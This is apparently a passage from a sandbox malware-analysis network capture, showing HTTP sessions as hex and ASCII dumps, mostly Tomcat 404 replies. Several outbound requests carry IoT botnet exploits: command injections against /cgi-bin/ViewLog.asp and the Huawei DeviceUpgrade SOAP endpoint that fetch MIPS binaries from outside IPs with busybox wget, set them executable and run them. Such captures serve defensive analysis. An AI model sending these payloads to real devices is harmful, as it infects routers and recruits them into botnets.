65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:16:01.712235928 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:13:01 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:16:09.728625059 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:13:01 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              185192.168.2.145769885.122.218.2048080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:54.597373962 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              186192.168.2.145772262.202.169.2218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:54.672545910 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              187192.168.2.144788294.120.161.778080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:54.708991051 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              188192.168.2.1442600156.235.105.1437215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:54.722537041 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:58.982795000 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:05.126454115 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:17.157973051 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 